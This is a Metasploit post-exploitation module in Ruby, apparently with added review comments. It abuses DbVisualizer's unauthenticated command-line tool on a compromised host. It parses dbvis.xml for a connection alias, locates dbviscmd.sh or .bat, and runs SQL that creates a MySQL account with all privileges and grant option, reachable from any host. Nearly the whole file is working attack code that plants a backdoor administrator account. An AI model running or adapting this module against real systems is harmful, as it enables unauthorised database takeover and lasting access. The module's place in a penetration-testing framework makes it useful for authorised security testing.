##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/auxiliary/report'
# Post module: resolves the configured DBALIAS to a database type by parsing
# the DbVisualizer settings file (dbvis.xml), locates the DbVisualizer command
# line tool (dbviscmd.sh / dbviscmd.bat) on the compromised host and executes
# the SQL produced by get_sql through it. All session interaction goes through
# the Msf::Post::File helpers and the meterpreter `session` object; only
# `linux` and `win` platforms are handled (see 'Platform' below).
class Metasploit3 < Msf::Post

  include Msf::Post::File
  include Msf::Post::Unix

  # Module metadata and options.
  #
  # Options (all required):
  #   DBALIAS    - connection alias as it appears in <Alias> in dbvis.xml
  #   DBUSERNAME - account name interpolated into the SQL built by get_sql
  #   DBPASSWORD - password interpolated into the SQL built by get_sql
  def initialize(info={})
    super( update_info( info,
      'Name' => 'Multi Manage DbVisualizer Add Db Admin',
      'Description' => %q{
        Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases
        (With GUI). The remote database can be accessed from the command line without the need
        to authenticate, which can be abused to create an administrator in the database with the
        proper database permissions. Note: This module currently only supports MySQL.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
      'References' =>
        [
          ['URL', 'http://youtu.be/0LCLRVHX1vA']
        ],
      'Platform' => %w{ linux win },
      'SessionTypes' => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptString.new('DBALIAS', [true,'Use dbvis_enum module to find out databases and aliases', 'localhost']),
        OptString.new('DBUSERNAME', [true,'The user you want to add to the remote database', 'msf']),
        OptString.new('DBPASSWORD', [true,'User password to set', 'msfRocks'])
      ], self.class)
  end

  # Entry point. Pipeline: exist_and_supported -> find_dbviscmd -> get_sql ->
  # dbvis_query. Each stage returns nil/blank on failure and has already
  # printed its own error, so the caller just stops silently at that point.
  def run
    db_type = exist_and_supported()
    unless db_type.blank?
      dbvis = find_dbviscmd()
      unless dbvis.blank?
        sql = get_sql(db_type)
        errors = dbvis_query(dbvis,sql)
        # dbvis_query only reports `true` when the tool's output matched
        # /denied|failed/i; any other outcome is treated as success here.
        if errors == true
          print_error("No luck today, access is probably denied for configured user !? Try in verbose mode to know what happened. ")
        else
          print_good("Privileged user created ! Try now to connect with user : #{datastore['DBUSERNAME']} and password : #{datastore['DBPASSWORD']}")
        end
      end
    end
  end

  # Check if the alias exist and if database is supported by this script.
  #
  # Locates dbvis.xml (config70 path first, then the older config path),
  # reads it and scans it line by line for a <Database> element whose <Alias>
  # equals datastore['DBALIAS'].
  #
  # Returns the <Type> string of the matching database when check_db_type
  # accepts it, otherwise nil (file missing, empty, alias absent, or type not
  # supported). Returning nil also when the file is unreadable relies on the
  # implicit `return` below.
  def exist_and_supported()
    case session.platform
    when /linux/
      # NOTE(review): the output of `whoami` is used as-is to build the path;
      # if it carries a trailing newline the constructed path is wrong
      # (find_dbviscmd below chomps its shell output, this branch does not).
      user = session.shell_command("whoami")
      print_status("Current user is #{user}")
      if (user =~ /root/)
        user_base = "/root/"
      else
        user_base = "/home/#{user}/"
      end
      dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
    when /win/
      user_profile = session.sys.config.getenv('USERPROFILE')
      dbvis_file = "#{user_profile}\\.dbvis\\config70\\dbvis.xml"
    end
    # NOTE(review): for a platform matching neither branch dbvis_file stays
    # unset here; 'Platform' restricts the module to linux/win, so this is
    # only reachable if that metadata is bypassed.

    unless file?(dbvis_file)
      # File not found, we next try with the old config path
      print_status("File not found: #{dbvis_file}")
      print_status("This could be an older version of dbvis, trying old path")
      case session.platform
      when /linux/
        dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
      when /win/
        dbvis_file = "#{user_profile }\\.dbvis\\config\\dbvis.xml"
      end
      unless file?(dbvis_file)
        print_error("File not found: #{dbvis_file}")
        return
      end
      # Recorded but never read anywhere in this module.
      old_version = true
    end

    print_status("Reading : #{dbvis_file}" )
    raw_xml = ""
    begin
      raw_xml = read_file(dbvis_file)
    rescue EOFError
      # If there's nothing in the file, we hit EOFError
      print_error("Nothing read from file: #{dbvis_file}, file may be empty")
      return
    end

    # Scanner state: db_found is true while between <Database id=...> and
    # </Database>; alias_found is true once the wanted <Alias> was seen inside
    # the current <Database> block and is cleared again when its <Type> has
    # been consumed.
    db_found = false
    alias_found = false
    db_type = nil
    db_type_ok = false

    # fetch config file
    # Line-oriented regex scan rather than an XML parser: each element of
    # interest is expected on its own line.
    raw_xml.each_line do |line|

      if line =~ /<Database id=/
        db_found = true
      elsif line =~ /<\/Database>/
        db_found = false
      end

      if db_found == true

        # check the alias (exact, case-sensitive comparison with DBALIAS)
        if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
          if datastore['DBALIAS'] == $1
            alias_found = true
            print_good("Alias #{datastore['DBALIAS']} found in dbvis.xml")
          end
        end

        # Informational only: the stored connection user is printed, not used.
        if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
          if alias_found
            print_good("Username for this connection : #{$1}")
          end
        end

        # check the type
        if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
          if alias_found
            db_type = $1
            db_type_ok = check_db_type(db_type)
            if db_type_ok
              print_good("Database #{db_type} is supported ")
            else
              print_error("Database #{db_type} is not supported (yet)")
              # Unsupported type is reported to the caller as nil.
              db_type = nil
            end
            alias_found = false
          end
        end
      end
    end
    if db_type.blank?
      print_error("Database alias not found in dbvis.xml")
    end
    return db_type # That is empty if DB is not supported
  end

  # Find path to dbviscmd.sh|bat
  #
  # Linux: relies on the `locate` command being available on the target.
  # Windows: lists the Program Files directory (the x86 one on x64 when the
  # ProgramFiles(X86) variable is set and actually expanded) and picks the
  # last entry matching /DbVisualizer/i as the install directory.
  #
  # Returns the path string, or nil when the tool cannot be found (an error
  # has already been printed in that case).
  def find_dbviscmd
    case session.platform
    when /linux/
      # NOTE(review): chomp strips only the final newline; if locate returns
      # several hits the value still spans multiple lines and is later quoted
      # as a single path in dbvis_query.
      dbvis = session.shell_command("locate dbviscmd.sh").chomp
      if dbvis.chomp == ""
        print_error("dbviscmd.sh not found")
        return nil
      else
        print_good("Dbviscmd found : #{dbvis}")
      end
    when /win/
      # Find program files
      progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
      progfiles_x86 = progfiles_env['ProgramFiles(X86)']
      # An unexpanded "%ProgramFiles(X86)%" literal means the variable does
      # not exist (32-bit Windows), so fall back to ProgramFiles.
      if not progfiles_x86.blank? and progfiles_x86 !~ /%ProgramFiles\(X86\)%/
        program_files = progfiles_x86 # x64
      else
        program_files = progfiles_env['ProgramFiles'] # x86
      end
      dirs = []
      session.fs.dir.foreach(program_files) do |d|
        dirs << d
      end
      dbvis_home_dir = nil
      # Browse program content to find a possible dbvis home
      # (no break: when several entries match, the last one wins).
      dirs.each do |d|
        if (d =~ /DbVisualizer[\S+\s+]+/i)
          dbvis_home_dir=d
        end
      end
      if dbvis_home_dir.blank?
        print_error("Dbvis home not found, maybe uninstalled ?")
        return nil
      end
      dbvis = "#{program_files}\\#{dbvis_home_dir}\\dbviscmd.bat"
      unless file?(dbvis)
        print_error("dbviscmd.bat not found")
        return nil
      end
      print_good("Dbviscmd found : #{dbvis}")
    end
    return dbvis
  end

  # Query execution method
  #
  # Runs `"<dbvis>" -connection <DBALIAS> -sql "<sql>"` through cmd_exec on
  # the session.
  #
  # Returns true when the command output matched /denied|failed/i, false in
  # every other case -- including when execution was skipped because the
  # path is not a file or the ownership check below did not pass. Callers
  # therefore cannot distinguish "not run" from "ran without a reported
  # error".
  def dbvis_query(dbvis,sql)
    error = false
    resp = ''
    if file?(dbvis) == true
      f = session.fs.file.stat(dbvis)
      # NOTE(review): f.uid / f.gid come from the remote stat, while
      # Process.euid and Process.groups describe the Ruby process running the
      # framework, not the session's user -- this comparison mixes the two
      # sides and the outcome depends on the operator's local ids. Confirm
      # the intended check against the session API.
      if f.uid == Process.euid or Process.groups.include?f.gid
        print_status("Trying to execute evil sql, it can take time ...")
        # DBALIAS and the SQL are interpolated into the command line unescaped;
        # quote characters in either would break the resulting command.
        args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
        dbvis = "\"#{dbvis}\""
        cmd = "#{dbvis} #{args}"
        resp = cmd_exec(cmd)
        vprint_line
        vprint_status("#{resp}")
        # Failure is inferred from output text only; the exit status is not
        # available here.
        if resp =~ /denied|failed/i
          error = true
        end
      else
        print_error("User doesn't have enough rights to execute dbviscmd, aborting")
      end
    else
      print_error("#{dbvis} is not a file")
    end
    return error
  end

  # Database dependent part

  # Check if db type is supported by this script.
  # Returns the match offset (truthy) for MySQL-like type strings, nil otherwise.
  def check_db_type(type)
    return type.to_s =~ /mysql/i
  end

  # Build proper sql
  #
  # For MySQL: four statements creating DBUSERNAME for 'localhost' and for
  # '%' and granting ALL PRIVILEGES ON *.* WITH GRANT OPTION to both. Values
  # are interpolated without escaping. Returns nil for any other type.
  def get_sql(db_type)
    if db_type =~ /mysql/i
      sql = "CREATE USER '#{datastore['DBUSERNAME']}'@'localhost' IDENTIFIED BY '#{datastore['DBPASSWORD']}';"
      sql << "GRANT ALL PRIVILEGES ON *.* TO '#{datastore['DBUSERNAME']}'@'localhost' WITH GRANT OPTION;"

      sql << "CREATE USER '#{datastore['DBUSERNAME']}'@'%' IDENTIFIED BY '#{datastore['DBPASSWORD']}';"
      sql << "GRANT ALL PRIVILEGES ON *.* TO '#{datastore['DBUSERNAME']}'@'%' WITH GRANT OPTION;"
      return sql
    end
    return nil
  end

end